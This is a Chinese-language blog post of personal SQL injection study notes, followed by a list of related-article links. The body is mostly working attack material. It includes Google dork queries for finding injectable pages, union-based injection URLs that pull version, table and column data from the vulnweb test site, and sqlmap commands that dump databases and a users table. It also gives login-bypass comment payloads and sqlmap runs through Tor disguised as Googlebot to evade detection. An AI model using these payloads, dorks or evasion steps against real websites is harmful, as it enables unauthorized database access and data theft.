sql注入學習簡單記錄

z奶油麵包發表於2018-02-28

版權宣告：轉載請註明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396286

參考學習：http://bbs.pediy.com/thread-218235.htm

Google search：
inurl:”products.php?prodID=”

inurl:buy.php?category=

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat=`

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

有時伺服器不能直接理解@@ version命令，需要轉換它。您將需要使用convert（@@版本使用latin1）或unhex（hex（@@版本））替換@@版本。

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

SQL隱碼攻擊的型別
經典SQLI
盲注或推斷SQL隱碼攻擊資料庫管理系統
特定的SQLI
複合SQLI
SQL隱碼攻擊+認證不足
SQL隱碼攻擊+ DDoS 攻擊
SQL隱碼攻擊+ DNS劫持
SQL隱碼攻擊+ XSS

錯誤過濾的轉義字元

當使用者輸入未針對轉義字元進行過濾時，會發生這種形式的SQL隱碼攻擊，然後將其傳遞到SQL語句
statement = “SELECT*FROM users WHERE name =`” + userName + “`;”

使用註釋甚至阻止查詢的其餘部分（有三種型別的SQL註釋）。所有三行最後都有一個空格：
` or `1`=`1` —
` or `1`=`1` ({
` or `1`=`1` /*

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5

偽裝成Googlebot：
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5 –user-agent=”Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

相關文章

sql注入簡單總結
2018-12-02
SQL
小白的學習記錄——Redis的簡單使用
2024-02-27
Redis
簡單的SQL語句學習
2020-07-07
SQL
演算法學習---歸併演算法簡單記錄
2020-10-29
演算法
sql注入waf繞過簡單入門
2019-03-27
SQL
簡單記錄幾個有用的sql查詢
2010-10-19
SQL
學習記錄-Laravel 核心依賴注入控制反轉反射
2019-08-08
Laravel依賴注入反射
Git 簡單使用學習筆記
2018-08-28
Git筆記
(一)《SQL進階教程》學習記錄--CASE
2021-11-07
SQL
SQL Server中的鎖的簡單學習
2016-07-10
SQLServer
Burp Suite學習記錄1 - 簡介
2020-11-25
UI
實戰記錄之SQL server報錯手工注入
2020-06-08
SQLServer
(二)《SQL進階教程》學習記錄--GROUP BY、PARTITION BY
2021-11-08
SQL
【每日學習記錄】使用錄影裝置記錄每天的學習
2019-03-13
SpringMVC學習記錄(五)--表單標籤
2018-01-17
SpringMVC
使用者下單+微信支付學習記錄
2024-04-23
Oracle 查詢重複記錄,以及簡單的sql應用。
2011-02-28
OracleSQL
記錄學習Promise
2019-03-15
Promise
windbg學習記錄
2018-08-23
Eureka學習記錄
2019-01-20
Mybatis學習記錄
2018-12-14
MyBatis
JAVA學習記錄
2020-12-20
Java
socket學習記錄
2020-12-01
JQuery學習記錄
2022-11-23
jQuery
larabbs 學習記錄
2021-12-10
Tableau學習記錄
2020-10-13
MySQL學習記錄
2018-06-04
MySql
Elasticsearch學習記錄
2017-03-31
Elasticsearch
swift學習記錄
2017-12-14
Swift
jQuery 學習記錄
2018-01-05
jQuery
RAC 學習記錄
2013-01-06
RMAN學習記錄
2012-10-04
RAC學習記錄
2007-10-30
Docker學習記錄
2024-04-18
Docker
http報文簡單記錄
2018-04-12
HTTP
SQL學習筆記
2024-04-24
SQL筆記
簡單學習js
2019-06-14
JS
Git簡單學習
2018-12-12
Git